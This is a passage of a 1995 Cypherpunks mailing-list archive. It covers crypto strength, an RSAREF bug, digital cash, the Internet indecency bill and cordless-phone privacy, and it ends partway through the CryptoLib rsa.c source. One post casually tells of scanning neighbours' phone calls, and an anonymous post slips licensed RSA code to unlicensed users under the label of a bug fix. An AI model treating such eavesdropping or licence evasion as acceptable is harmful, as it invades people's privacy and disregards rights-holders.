print out the first 100 characters, making it child's play to extract passwords. If you think that you are secure because the effort of an attack seems on the high side, bear in mind that the tasks in a systematic attack can by definition of "systematic" be programmed, greatly easing the attacker's task. And once programmed, the program can be distributed to all and sundry on the internet. If a given level of cryptographic strength seems adequate for a message, add several orders of magnitude and maybe you'll be lucky. I know of only two really satisfactory places to hide information worth hiding: combinatorial search space (read: real encryption such as DES or RSA, with a hefty key), and the real world, which as a search space is approximately the size corresponding to a combinatorial space encrypted with a 256-bit key (i.e. the world seems bigger than 128 bits and smaller than 512). The latter is distributed in space-time and frequency (momentum-energy); if you consider only space-time or only frequency the universe looks like only a 128-bit hiding place in either case. Both together give you 256 bits (very approximately, that's a very round binary number). Vaughan Pratt - ------- end ------- -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface iQCVAwUBMOCS5khaKuRiAqcVAQEJEAP/WNqKrjrGk5LpYt5fw70BtFYZEIMqkBzu TQscTmoK2sSOeI9yjxmOp8aQhArLpOdN0ZQgfwkuelfV+/n73ms3hMV+JIDOvuFx hirE1iBvZDMgEPX1BdyP94Me13a1f8mBKTTG1cPLIYKLSTZ1tmQ/MVI0EYN9H16U AETV7FJilvM= =l+fI -----END PGP SIGNATURE----- From ponder at wane-leon-mail.scri.fsu.edu Wed Dec 27 07:07:25 1995 From: ponder at wane-leon-mail.scri.fsu.edu (P.J. Ponder) Date: Wed, 27 Dec 1995 23:07:25 +0800 Subject: MD5 for DOS/Windows Message-ID: Anybody have a DOS or Windows implementation of MD5 available? Thanks. -- PJ Ponder From sameer at c2.org Wed Dec 27 08:41:34 1995 From: sameer at c2.org (sameer) Date: Thu, 28 Dec 1995 00:41:34 +0800 Subject: fun with rsaref and 64-bit machines Message-ID: <199512270120.RAA19559@infinity.c2.org> Does anyone know if RSAREF works on 64 bit CPUs? It seems that RSAREF's NN_Mod is getting stuck in digit.c at: 99 */ 100 while ((t[1] > 0) || ((t[1] == 0) && t[0] >= c)) { 101 if ((t[0] -= c) > (MAX_NN_DIGIT - c)) 102 t[1]--; 103 aLow++; 104 } on a dec alpha.. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From vznuri at netcom.com Wed Dec 27 09:57:52 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Thu, 28 Dec 1995 01:57:52 +0800 Subject: a new idea: stocks == currency Message-ID: <199512270222.SAA01737@netcom6.netcom.com> I've been mulling over recent essays on digital cash by diverse authors that have popped up here and elsewhere and I'd like to highlight a revolutionary new "meme" of high cpunk relevance I see emerging, which I've not seen promoted by any single author yet (although I have seen some prominent cpunks argue the opposite). the basic thesis is as follows. digital cash obviously leads to an entirely new economic system in which the nature of routine future transactions may be radically altered. one of the chief alterations discussed ad infinitum on this list is the rise of economic freedom from taxation etc. however there is another interesting theme that is worth exploring at length that is at least as significant as this (bugaboo) taxation issue. one might look at the modern world and suggest that there is an increasing unification of currencies. the EU (European Union) is an example of this "trend". however I'm going to argue the opposite and suggest that the trend is toward increasing diversity of currencies. I believe we are moving toward a new system in which explosively more "currencies" will exist than do today. where will these come from? answer: stocks. I believe that future company stock will be considered a kind of currency issued by the company. when you are buying and selling stocks, what you are really doing is buying and selling currencies backed by different corporate entities. I have seen EH argue here and elsewhere that only a government has the legal capability of creating a currency. his view is that a currency is backed through *liability* that is enforced through laws. this is an interesting statist-flavor argument coming from a radical libertarian. what I would propose instead is that what a government has is *credibility*. this is the old "reputation capital" issue discussed here frequently too. a government is a massive entity larger than many companies that uses its full legislative "force" to back its currency. in another word, *trust*. however, I don't believe there is fundamentally a major difference between a company and a government, particularly in this area. (go ahead, flame me to oblivion for saying this, but I believe it is actually a very libertarian argument.) the only difference is in size and influence. it seems to me when a private company issues "cash", the basic principle is the same. the person who uses this cash is *trusting* the entity that issues it to back it with whatever they say they are backing with it. to use my stocks == currency analogy, the stock or currency of that company is backed by that company's assets and profitability. the interesting theme behind this is that it unifies the entire economic picture. suddenly the difference between currency and a stock tends to blur when stocks 1. can be exchanged readily 2. there is no government intervention/regulation in the exchange 3. middleman ("stockbroker" etc.) costs are minimized 4. (other similar elements yet to be identified) note that all these things appear to be the inevitable trend of uniting an economic system with cyberspace. -- my view of all this is somewhat blasphemous. the current system says that we have to have a government entity called the SEC to ensure that stocks are safe for those who invest in them. however, what I am suggesting is that a free market can actually devise its own methods of sorting out bogus from valid currency/stocks without government intervention. in fact, in my opinion that's precisely what investment advice is. this is exactly analogous too to the way that capital "naturally" moves away from unstable currencies and economies (of course capital does not do it, but the intelligent human forces that guide it amount to this basic effect). hence what I am proposing is a sort of currency spectrum. stocks are high risk but greater profit, and currency is low risk (stable) but subject to inflation or loss of value. they are two ends on a currency spectrum. and what I am proposing is that in the future, this currency spectrum will tend to emerge out of economic transactions in cyberspace. this currency spectrum will be recognized as a basic function of the cyberspatial economy. this economy will evolve overall to cut out middlemen and anything that decreases cash value. hence, you will see things such as companies offering their own cash (stock) directly to "consumers" without the large overhead associated with today's stock market (which will be considered a rather backward way of running an economy in the future because of the horrendous dissipation of capital involved in merely moving it from place to place). -- in the end, the government and various bankers lose their economic monopoly on "creating" cash, which affords them no end to manipulative capabilities. governments will compete with all other entities that desire to create cash systems. cash will move where governments and entities most "respect" it. oppressive tax laws etc. will be considered a lack of "respect" for cash. I know that the opposite trend seems to be happening: an increasing clampdown on "black cash". I think this may actually succeed in the short run, but the eventual movement of the economy is toward unrestrained cash in the same way there is a clear movement to an unrestrained cyberspace. there may be "blips" or "disturbances" on the way, but they'd merely be anomalies. my own view is that governments are either legitimately created or they are not ("consent of the governed" etc.). if they are legitimately created and maintained, then people will continue to support them even when it seems they have the choice not to (such as evade taxes). if they are not supported, then they are not legitimate. putting one's money where one's mouth is is the ultimate test of legitimacy in our reality. that is, support of a government by its people is the ultimate test of its legitimacy, and the the ultimate test of support is *cash*transferred*. no amount of policemen thugs pointing machine guns at tax protesters attempting to intimidate the entire population will change this basic reality imho. in fact I believe that many systems of today that are based on intimidation are going to dissolve as cyberspace becomes more prevalent. the scientology battle is a good example of this. before the internet their litigious intimidation tactics may have succeeded (and arguably did). however the tactics are becoming increasingly discredited in my view. but I am not saying this will happen without a struggle. I believe this will be the ultimate conclusion after a lot of turbulence and perhaps even bloodshed. -- today we think that cash moves around the world very readily, in the blink of an eye. but I suggest that today we actually have tremendous amounts of "friction" that are dissipating economic value of "currencies" merely as it moves through the system (the stock market would be one example). looking only at today's *cash* systems, indeed there is low friction, but when considers that *stocks* are actually cash, then our overall economic system is quite backward. cyberspace will act as a sort of economic lubricant of the highest degree in decreasing this friction. I will debate intelligent opposition to these ideas in this essay, but frankly I think what I describe is a reality that is going to emerge completely independent of my own promotion or anyone else's opposition. the famous Gilmore quote is that "cyberspace sees censorship as a defect and routes around it" has an analogy in the economic realm: "cash sees the middlemen as a defect and routes around him". inflation is one example of instability or lack of resiliency (a defect) of a currency. it can be seen as the exact opposite effect the growth of a stock is: loss of economic capital due to dissipation. I imagine one of the main claims against my essay will be as I anticipated above: only governments have the force and power necessary to back a currency. but I believe this is an anti-libertarian view. it suggests that cash only works when the government is involved, and the force associated with that government is employed as a means of keeping the system in check. can one have an economic system not based on mandatory obeisance to a government? I think it is clear to most on this list such a thing is not only possible but advantageous, desireable, and preferrable. the "trust" that a person places in a company stock is absolutely no different, in essence, from that placed in a currency of a government-- only the scale and the participants are different. I don't really believe that the legal framework associated with a government is what holds commerce together. there are many situations where companies simply eat their losses even when they are in the "right" legally and could sue and win. cyberspace will tend to prefer "anticipation" to legalities. in other words, it will tend to prefer to develop systems that anticipate failure (such as currency crashes) before they happen. courts will be seen as the absolute last resort for any kind of arbitration. in my view this has already happened today. From jya at pipeline.com Wed Dec 27 12:11:49 1995 From: jya at pipeline.com (John Young) Date: Thu, 28 Dec 1995 04:11:49 +0800 Subject: Rawbutt Day Message-ID: <199512261643.LAA28628@pipe1.nyc.pipeline.com> Rasping rawbutts for National Whiners Day here's a duo of pinhole puckers about the shut-your-filthy-hole bill: ---------- The Wash Post, Dec 25, 1995: Internet Football The Internet provisions are still in flux along with the rest of the host telecommunications bill, in which this newspaper and its parent company have an interest. If these provisions go through in anything like their present form, then their vulnerability to challenge on First Amendment grounds seems clear. It makes sense for a court to sort out the constitutional from the technical aspects of this new form of "speech," and the sooner the better. It won't be easy. The main legal questions about the proposed Internet indecency regulations as they now stand are inextricably wound up with technical issues. Can the "transmitters" of material that is deemed "indecent" ensure to a reasonable degree of certainty that underage computer users cannot get to it? If they fail, how can they show they tried? Several ideas here are flags for trouble. No legally solid test exists for the "indecency" standard now in the regulations -- patterned on those used for earlier dial-a-porn legislation but addressing totally different technologies. The coalition of moderate conferees had tried to replace the term with the more explicit "harmful to minors" but failed by a single vote. The Justice Department said in a letter last week that a "harmful to minors" standard was more likely than "indecency" to pass scrutiny but that "an overly broad restriction would likely not withstand constitutional scrutiny regardless of the standard chosen." That brings up the meaning of "transmit." Who is responsible for "transmitting" a smutty text that, say, a high school student locates by using an ordinary commercial account to (1) find, download and install free software that searches the Web, (2) use that tool to find a pornographic bulletin board overseas, and (3) make a copy to store in his own computer? The regulations now would punish anyone who "uses any interactive computer service to display [indecent material] in a manner available to a person under 18 years of age." But the bulletin board overseas isn't subject to U.S. Iaw. Most likely it will be up to the commercial providers to demand ID for certain types of accounts -- or up to account-buying parents to limit the scope of their kids' accounts. Whether providers can actually wall off sectors of the electronic world without cooperation from the adults paying the bills has more to do with the available electronic gizmos than with the laws governing the world to which they give access. There is much complicated back-and-forth about whether providers such as America Online and Prodigy will be held responsible for the effectiveness of the measures they take. But only the courts can decide what truly works. A court muddled its way through the Prodigy case on this topic in New York State recently. It declined to modify its own judgment that the provider was more liable because it had tried to create a "PG bulletin board" than if it had not. Whether or not this stands, it's a measure of the disconnect that persists as this legislation stumbles toward final enaction. ---------- The NY Times, Dec 26, 1995: Mr. Hollings Saves the Phone Bill House and Senate conferees seemed ready to negotiate a damaging telecommunications compromise until Senator Ernest Hollings of South Carolina, the chief Senate negotiator, altered that destiny last week. Wielding the threat of a filibuster and a deft legislative hand, he rescued the best parts of flawed House and Senate bills passed earlier, added some good new ideas and threw out most of the rot. His draft bill could spark innovation and set off consumer-friendly competition among television, cable and telephone companies. Its biggest flaw is a heavy-handed and probably unconstitutional effort to ban "indecent material" from the Internet. The original bills sought to break down barriers that keep media companies from entering each other's markets. But three mistakes were made. The bills would have deregulated cable rates before competition by other video companies could protect customers from price-gouging cable operators. Local phone companies would have been allowed to enter the long-distance market before they faced competition from cable or other companies. Worse still, the bills would have allowed broadcasters, cable operators, telephone companies and newspapers to merge too easily. That could expose consumers to a frightening concentration of information sources. Mr. Hollings, with the help of key Republicans like Senator Larry Pressler, fixed most of these flaws. His draft bill would hold up entry of local phone companies into long-distance service until the Federal Communications Commission says O.K. after giving weight to an antitrust review by the Justice Department. The bill leaves it up to the F.C.C. to set reasonable guidelines for mergers. It would put off deregulation of most cable rates for three years -- enough time for phone and satellite services to take on cable operators. The one serious error is a prohibition against transmission of allegedly indecent materials over the Internet -- the network of millions of on-line computer subscribers around the world. The indecency standard is probably unconstitutionally vague and restrictive. The standard is also unnecessary. The law already forbids sending obscene materials by computer. To protect children, parents can buy easy-to-use programs that block indecent materials from any source. The draft bill threatens to trigger further Government control of electronic communication -- which has blossomed so far precisely because Government has stayed on the sidelines. Fortunately, Republican leaders like Speaker Newt Gingrich are troubled by the indecency standard. There is a good opportunity to knock the provision out before Congress takes a vote. Some Republicans, miffed when Vice President Al Gore declared the draft an Administration victory, threatened to withhold support. But telecommunications, the heart of a high-tech economy, is too important for small-minded sparring. Congress should take up the draft bill, remove the indecency provision and put Mr. Holling's good deed into law. ---------- [The coccyx of a 12-26-95 WSJ eunucher]: First Amendment advocates, who have criticized the bill because it cracks down on Internet indecency and sets up a rating system and show-blocking circuitry against TV violence, got one small gift: The bill contains a provision for an expedited legal review of the constitutionality of those provisions. On the other hand, it also sets up a new law allowing 10-year prison terms for anyone who, using interstate phone calls, mail or other means, "persuades, induces, entices, or coerces" a minor to engage in any illegal sexual act. From jamesd at echeque.com Wed Dec 27 12:14:19 1995 From: jamesd at echeque.com (James A. Donald) Date: Thu, 28 Dec 1995 04:14:19 +0800 Subject: COMMUNITY CONNEXION ANNOUNCES APACHE-SSL COMMERCE Message-ID: <199512270332.TAA01269@blob.best.net> At 01:12 PM 12/26/95 -0800, sameer wrote: > The Apache-SSL Commerce webserver is the only commercial encrypting > webserver with source available. Ian Goldberg, graduate student at > U.C. Berkeley, well-known for his work on SSL security, commented on > the importance of available source, Thanks for the great work. This protects the web against GAK far more effectively than any political campaign ever could. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From tallpaul at pipeline.com Wed Dec 27 12:48:49 1995 From: tallpaul at pipeline.com (tallpaul) Date: Thu, 28 Dec 1995 04:48:49 +0800 Subject: Only accepting e-mail from known parties Message-ID: <199512261823.NAA27668@pipe3.nyc.pipeline.com> On Dec 26, 1995 08:37:30, '"Robert A. Rosenberg" ' wrote: >At 14:33 12/25/95, tallpaul wrote: > >>Thoughts? (I see one problem with this but it should be able to be worked >>out once the basic method is agreed to). > >I assume that the "Problem" is that by only giving each corespondent ONE >E-Stamp, you are single streaming your connections with them (ie: Are >talking Half-Duplex). Not only are they restricted to one message >"in-flight" but they can not start another message until they have done a >capture run to acquire your ACK and get the new key. > Actually, with e-mail the problem was an infinite loop of stamp exchanges. E.G. both of us are finickians who only accept e-mail from known associates. So they send me an e-message with the correct stamp. I send them an acknowlegmenet with a new stamp, but ... they won't accept the message from me unless I stamp it. So I stamp my return receipt. They get the return receipt and have to send me a new stamp, using the stamp I just sent them. I then ackowledge receipt from them, using the stamp they just sent me, and it is turtles all the way down. The workaround would be to have a semi-psycho e-bot who hoarded stamps, i.e. would accept stamps from anybody without treating an e-stamp as an e-mail message to me. I hadn't picked up the problem you mentioned. Thanks for pointing it out. I supposed the fix would be to send family (so to speak) books of stamps so they could send multiple messages when I was on vacation, my personal e-bot was down, etc. Of course, then family could get conned out of their stamps by smooth talking ad spammers. But this would, I think, be a rare occurance. That is, I wasn't thinking of *absolute* security just "good enough privacy." --tallpaul From hal9001 at panix.com Wed Dec 27 12:50:08 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Thu, 28 Dec 1995 04:50:08 +0800 Subject: Only accepting e-mail from known parties Message-ID: At 13:23 12/26/95, tallpaul wrote: >I hadn't picked up the problem you mentioned. Thanks for pointing it out. > You're welcome - You _did_ ask for comments/analysis . From dlv at bwalk.dm.com Wed Dec 27 13:56:52 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Thu, 28 Dec 1995 05:56:52 +0800 Subject: Bidzos on C-span Message-ID: <8NaRgD2w165w@bwalk.dm.com> I was very impressed by Bidzos's talk to C-Span. I'm sorry I didn't tape it. --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From floyddb at alpha.c2.org Wed Dec 27 14:02:25 1995 From: floyddb at alpha.c2.org (floyddb at alpha.c2.org) Date: Thu, 28 Dec 1995 06:02:25 +0800 Subject: 900 MHz phones Message-ID: <199512270428.UAA04497@infinity.c2.org> It seems like the hornets nest has been stirred. I was merely trying to point out a possible consumer grade hole in some of the FH phones currently on the market. If the Interceptor or Scout can be used to listen to a FH phone, then surely it is being done. I used to work with a guy who would program his scanner to all of his neighbors cordless phone frequencies, then he would call them to verify his programming. A six-pack on a Saturday night and the scanner would be more entertaining than the bug light. Personally, my concern is with my next door neighbor listening to me talk to my girlfriend, not the NSA. If I want to arrange delivery of PGP to the Russians of where I should pick up my next 50 kg of cocaine, I'm *not* going to use my home phone. Because of these concerns, I refuse to own a cordless phone. So if the 900 MHz phones are resistant to these consumer grade attacks, they might be worth the money, otherwise the neighbors will just upgrade. Floyd D. Barber floyddb at alpha.c2.org Key fingerprint: 8A 98 1F 6B 70 7A FE 24 35 D4 48 CF 9D F6 B0 91 From frantz at netcom.com Wed Dec 27 15:05:46 1995 From: frantz at netcom.com (Bill Frantz) Date: Thu, 28 Dec 1995 07:05:46 +0800 Subject: a new idea: stocks == currency Message-ID: <199512270801.AAA11701@netcom9.netcom.com> At 18:22 12/26/95 -0800, Vladimir Z. Nuri wrote: >...An I believe that future company >stock will be considered a kind of currency issued by the company. when >you are buying and selling stocks, what you are really doing is buying >and selling currencies backed by different corporate entities. Here are some differences between stocks and currencies. I don't know how they effect your arguments, but I do invite comment: Stocks Curriences (1) Voting Most stock Based on residency inplies voting not net worth (2) Reputation availability Many stocks, Few curriencies, reputations hard to reputations well known find (3) Legal backing Based on government same (4) Dividends Commonly payed never heard of it ----------------------------------------------------------------- Bill Frantz Periwinkle -- Computer Consulting (408)356-8506 16345 Englewood Ave. frantz at netcom.com Los Gatos, CA 95032, USA From cpunk at remail.ecafe.org Thu Dec 28 09:21:40 1995 From: cpunk at remail.ecafe.org (ECafe Anonymous Remailer) Date: Thu, 28 Dec 95 09:21:40 PST Subject: Cryptolib 1.1 rsa.c Message-ID: <199512281722.RAA18284@pangaea.ang.ecafe.org> I am informed that there is a serious bug in the version of cryptolib that gets sent to people who don't have RSA licenses. The bug prevents it from doing RSA encrypt, decrypt or signature. I cannot imagine how this bug slipped through but it seems only to exist in the copies of cryptolib that are sent to those without RSA licenses. Fortunately I have an RSA licesnse and so my new copy (thanks Jack and Matt!) does not suffer from the bug. Here is the version of rsa.c that fixes the bug. /* * This is version 1.1 of CryptoLib * * The authors of this software are Jack Lacy, Don Mitchell and Matt Blaze * Copyright (c) 1991, 1992, 1993, 1994, 1995 by AT&T. * Permission to use, copy, and modify this software without fee * is hereby granted, provided that this entire notice is included in * all copies of any software which is or includes a copy or * modification of this software and in all copies of the supporting * documentation for such software. * * NOTE: * Some of the algorithms in cryptolib may be covered by patents. * It is the responsibility of the user to ensure that any required * licenses are obtained. * * * SOME PARTS OF CRYPTOLIB MAY BE RESTRICTED UNDER UNITED STATES EXPORT * REGULATIONS. * * * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED * WARRANTY. IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE. */ /* * Code for generating and manipulating RSA keys * and doing encryption and decryption using RSA. * AT&T recognizes that RSA is patented * (Rivest et. al. U.S. Patent 4,405,829, issued 9/20/83). * Use of this code assumes proper licensing. * * coded by Jack Lacy, December, 1991 * */ #include "libcrypt.h" static Key_exps *genKeyExps P((BigInt, BigInt, BigInt, int, BigInt)); static void chineseRemTheorem P((BigInt , RSAPrivateKey *, BigInt)); static void genPrimesFor3 P((int, BigInt, BigInt, BigInt, BigInt)); #ifdef K_AND_R static Key_exps * genKeyExps(p, q, e, ebits, randomStart) BigInt p, q, e; int ebits; BigInt randomStart; #else static Key_exps *genKeyExps(BigInt p, BigInt q, BigInt e, int ebits, BigInt randomStart) #endif { BigInt phi, p1, q1; BigInt u1, ngcd, ignore; Key_exps *exps; int ebytes; #ifdef DLLEXPORT HGLOBAL handle = clib_malloc(sizeof(Key_exps)); exps = (Key_exps *)GlobalLock(handle); exps->exp_handle = handle; #else exps = (Key_exps *)clib_malloc(sizeof(Key_exps)); #endif p1 = bigInit(0); q1 = bigInit(0); phi = bigInit(0); u1 = bigInit(0); ngcd = bigInit(0); ignore = bigInit(0); if (e == NULL) e = bigInit(3); bigSubtract(p, one, p1); bigSubtract(q, one, q1); bigMultiply(p1, q1, phi); freeBignum(p1); freeBignum(q1); /* Get public exponent, relatively prime to modulus. */ /* A by product of the extendedGcd calculation is the inverse of e mod phi, which is d, the private exponent. If e has been specified, skip this. */ if (e == NULL) { if (ebits > 2) { ebytes = (ebits/8) + (ebits%8? 1: 0); if (randomStart == NULL) { bigRand(ebytes, e, PSEUDO); } else { bigCopy(randomStart, e); } if (EVEN(e)) bigAdd(e, one, e); } } extendedGcd(e, phi, u1, ignore, ngcd); while (bigCompare(ngcd, one) != 0) { bigAdd(e, two, e); extendedGcd(e, phi, u1, ignore, ngcd); } exps->d = u1; exps->e = e; freeBignum(phi); freeBignum(ngcd); freeBignum(ignore); return exps; } #ifdef K_AND_R _TYPE( RSAPublicKey * ) buildRSAPublicKey(e, n) BigInt e, n; #else _TYPE( RSAPublicKey * ) buildRSAPublicKey(BigInt e, BigInt n) #endif { RSAPublicKey *pk; #ifdef DLLEXPORT HGLOBAL handle = clib_malloc(sizeof(RSAPublicKey)); pk = (RSAPublicKey *)GlobalLock(handle); pk->pubkey_handle = handle; #else pk = (RSAPublicKey *)clib_malloc(sizeof(RSAPublicKey)); #endif pk->publicExponent = e; pk->modulus = n; return pk; } #ifdef K_AND_R _TYPE( RSAPrivateKey * ) buildRSAPrivateKey(e, d, p, q, dp, dq, c12) BigInt e, d, p, q, dp, dq, c12; #else _TYPE( RSAPrivateKey * ) buildRSAPrivateKey(BigInt e, BigInt d, BigInt p, BigInt q, BigInt dp, BigInt dq, BigInt c12) #endif { RSAPrivateKey *pk; ChineseRemStruct *crt; #ifdef DLLEXPORT HGLOBAL crt_handle = clib_malloc(sizeof(ChineseRemStruct)); HGLOBAL handle = clib_malloc(sizeof(RSAPrivateKey)); crt = (ChineseRemStruct *)GlobalLock(crt_handle); crt->crt_handle = crt_handle; pk = (RSAPrivateKey *)GlobalLock(handle); pk->privkey_handle = handle; #else crt = (ChineseRemStruct *)clib_malloc(sizeof(ChineseRemStruct)); pk = (RSAPrivateKey *)clib_malloc(sizeof(RSAPrivateKey)); #endif pk->publicExponent = e; pk->privateExponent = d; pk->modulus = bigInit(0); bigMultiply(p, q, pk->modulus); pk->crt = crt; pk->crt->p = p; pk->crt->q = q; pk->crt->dp = dp; pk->crt->dq = dq; pk->crt->c12 = c12; return pk; } #ifdef K_AND_R _TYPE( RSAKeySet * ) buildRSAKeySet(e, d, p, q) BigInt e, d, p, q; #else _TYPE( RSAKeySet * ) buildRSAKeySet(BigInt e, BigInt d, BigInt p, BigInt q) #endif { BigInt pminus1, qminus1, n, dp, dq, c12; BigInt ecopy, dcopy; RSAKeySet *ks; #ifdef DLLEXPORT HGLOBAL ks_handle = clib_malloc(sizeof(RSAKeySet)); ks = (RSAKeySet *)GlobalLock(ks_handle); ks->keyset_handle = ks_handle; #else ks = (RSAKeySet *)clib_malloc(sizeof(RSAKeySet)); #endif n = bigInit(0); bigMultiply(p, q, n); ecopy = bigInit(0); bigCopy(e, ecopy); ks->publicKey = buildRSAPublicKey(ecopy, n); pminus1 = bigInit(0); qminus1 = bigInit(0); bigSubtract(p, one, pminus1); bigSubtract(q, one, qminus1); dp = bigInit(0); dq = bigInit(0); bigMod(d, pminus1, dp); bigMod(d, qminus1, dq); c12 = bigInit(0); getInverse(q, p, c12); ecopy = bigInit(0); bigCopy(e, ecopy); dcopy = bigInit(0); bigCopy(d, dcopy); ks->privateKey = buildRSAPrivateKey(ecopy, dcopy, p, q, dp, dq, c12); freeBignum(pminus1); freeBignum(qminus1); return ks; } #ifdef K_AND_R static void genPrimesFor3(nbits, p, q, r1, r2) int nbits; BigInt p, q, r1, r2; #else static void genPrimesFor3(int nbits, BigInt p, BigInt q, BigInt r1, BigInt r2) #endif { BigInt ngcd, ignore, three, pminus1, qminus1; ignore = bigInit(0); three = bigInit(3); pminus1 = bigInit(0); qminus1 = bigInit(0); /* Gordon algorithm doesn't care about the p-1 factor size */ genStrongPrimeSet(nbits/2, p, (int)NULL, ignore, GORDON, r1); bigSubtract(p, one, pminus1); ngcd = gcd(three, pminus1); while (bigCompare(ngcd, one) != 0) { if (r1 != NULL) randomize(r1); freeBignum(ngcd); genStrongPrimeSet(nbits/2, p, (int)NULL, ignore, GORDON, r1); bigSubtract(p, one, pminus1); ngcd = gcd(three, pminus1); } freeBignum(ngcd); genStrongPrimeSet(nbits/2, q, (int)NULL, ignore, GORDON, r2); bigSubtract(q, one, qminus1); ngcd = gcd(three, qminus1); while (bigCompare(ngcd, one) != 0) { if (r2 != NULL) randomize(r2); freeBignum(ngcd); genStrongPrimeSet(nbits/2, q, (int)NULL, ignore, GORDON, r2); bigSubtract(q, one, qminus1); ngcd = gcd(three, qminus1); } freeBignum(ngcd); freeBignum(pminus1); freeBignum(qminus1); freeBignum(ignore); freeBignum(three); } #ifdef K_AND_R _TYPE( int ) randBytesNeededForRSA (modlen, ebits) int modlen, ebits; #else _TYPE( int ) randBytesNeededForRSA (int modlen, int ebits) #endif { int bytes; bytes = ((modlen + ebits)/8) + ((modlen+ebits)%8? 1: 0); return bytes; } #ifdef K_AND_R _TYPE( RSAKeySet * ) genRSAKeySet(nbits, ebits, e, randomStart) Ulong nbits, ebits, randomStart; BigInt e; #else _TYPE( RSAKeySet * ) genRSAKeySet(int nbits, int ebits, BigInt e, BigInt randomStart) #endif { BigInt p, q, ignore, r1, r2; Key_exps *exps; RSAKeySet *key_set; int oldlen; BigInt randStart; p = bigInit(0); q = bigInit(0); r1 = NULL; r2 = NULL; randStart = NULL; if (randomStart != NULL) { r1 = bigInit(0); r2 = bigInit(0); randStart = bigInit(0); bigCopy(randomStart, randStart); oldlen = LENGTH(randStart); LENGTH(randStart) = nbits/32/2; bigCopy(randStart, r1); LENGTH(randStart) = oldlen; bigRightShift(randStart, nbits/2, randStart); oldlen = LENGTH(randStart); LENGTH(randStart) = nbits/32/2; bigCopy(randStart, r2); LENGTH(randStart) = oldlen; bigRightShift(randStart, nbits/2, randStart); } if (ebits == 2) genPrimesFor3(nbits, p, q, r1, r2); else { ignore = bigInit(0); genStrongPrimeSet(nbits/2, p, (int)NULL, ignore, GORDON, r1); genStrongPrimeSet(nbits/2, q, (int)NULL, ignore, GORDON, r2); freeBignum(ignore); } exps = genKeyExps(p, q, e, ebits, randStart); key_set = buildRSAKeySet(exps->e, exps->d, p, q); freeBignum(exps->e); freeBignum(exps->d); if (r1 != NULL) { freeBignum(r1); freeBignum(r2); freeBignum(randStart); } #ifdef DLLEXPORT GlobalUnlock(exps->exp_handle); GlobalFree(exps->exp_handle); #else free((char *)exps); #endif return key_set; } /* Chinese Remainder Theorem reconstruction of m^d mod n, using m^dp mod p and m^dq mod q with dp = d mod p-1, dq = d mod q-1. */ #ifdef K_AND_R static void chineseRemTheorem(m, key, em) BigInt m, em; RSAPrivateKey *key; #else static void chineseRemTheorem(BigInt m, RSAPrivateKey *key, BigInt em) #endif { BigInt u1, u2; BigInt p, q, dp, dq, c12; p = key->crt->p; q = key->crt->q; dp = key->crt->dp; dq = key->crt->dq; c12 = key->crt->c12; u1 = bigInit(0); u2 = bigInit(0); bigPow(m, dp, p, u1); bigPow(m, dq, q, u2); crtCombine(u1, u2, p, q, c12, em); freeBignum(u1); freeBignum(u2); } #ifdef K_AND_R _TYPE( void ) freeRSAPublicKey(pk) RSAPublicKey *pk; #else _TYPE( void ) freeRSAPublicKey(RSAPublicKey *pk) #endif { freeBignum(pk->publicExponent); freeBignum(pk->modulus); #ifdef DLLEXPORT GlobalUnlock(pk->pubkey_handle); GlobalFree(pk->pubkey_handle); #else free((char *)pk); #endif } #ifdef K_AND_R _TYPE( void ) freeRSAPrivateKey(pk) RSAPrivateKey *pk; #else _TYPE( void ) freeRSAPrivateKey(RSAPrivateKey *pk) #endif { freeBignum(pk->publicExponent); freeBignum(pk->privateExponent); freeBignum(pk->modulus); freeBignum(pk->crt->p); freeBignum(pk->crt->q); freeBignum(pk->crt->dp); freeBignum(pk->crt->dq); freeBignum(pk->crt->c12); #ifdef DLLEXPORT GlobalUnlock(pk->crt->crt_handle); GlobalFree(pk->crt->crt_handle); GlobalUnlock(pk->privkey_handle); GlobalFree(pk->privkey_handle); #else free((char *)pk->crt); free((char *)pk); #endif } #ifdef K_AND_R _TYPE( void ) freeRSAKeys(ks) RSAKeySet *ks; #else _TYPE( void ) freeRSAKeys(RSAKeySet *ks) #endif { freeRSAPublicKey(ks->publicKey); freeRSAPrivateKey(ks->privateKey); #ifdef DLLEXPORT GlobalUnlock(ks->keyset_handle); GlobalFree(ks->keyset_handle); #else free((char *)ks); #endif } #ifdef K_AND_R _TYPE( BigInt ) RSAEncrypt(message, key) BigInt message; RSAPublicKey *key; #else _TYPE( BigInt ) RSAEncrypt(BigInt message, RSAPublicKey *key) #endif { BigInt result; result = bigInit(3); if (bigCompare(key->publicExponent, result) == 0) { reset_big(result, 0); bigCube(message, key->modulus, result); } else { reset_big(result, 0); bigPow(message, key->publicExponent, key->modulus, result); } return result; } #ifdef K_AND_R _TYPE( BigInt ) RSADecrypt(message, key) BigInt message; RSAPrivateKey *key; #else _TYPE( BigInt ) RSADecrypt(BigInt message, RSAPrivateKey *key) #endif { BigInt result; result = bigInit(0); chineseRemTheorem(message, key, result); return result; } #ifdef K_AND_R _TYPE( RSASignature * ) RSASign(message, key) BigInt message; RSAPrivateKey *key; #else _TYPE( RSASignature * ) RSASign(BigInt message, RSAPrivateKey *key) #endif { return (RSASignature *)RSADecrypt(message, key); } #ifdef K_AND_R _TYPE( Boolean ) RSAVerify(message, sig, key) BigInt message; RSASignature *sig; RSAPublicKey *key; #else _TYPE( Boolean ) RSAVerify(BigInt message, RSASignature *sig, RSAPublicKey *key) #endif { Boolean retval; BigInt cmp; cmp = (BigInt)RSAEncrypt((BigInt)sig, key); if (bigCompare(message, cmp) == 0) retval = TRUE; else retval = FALSE; 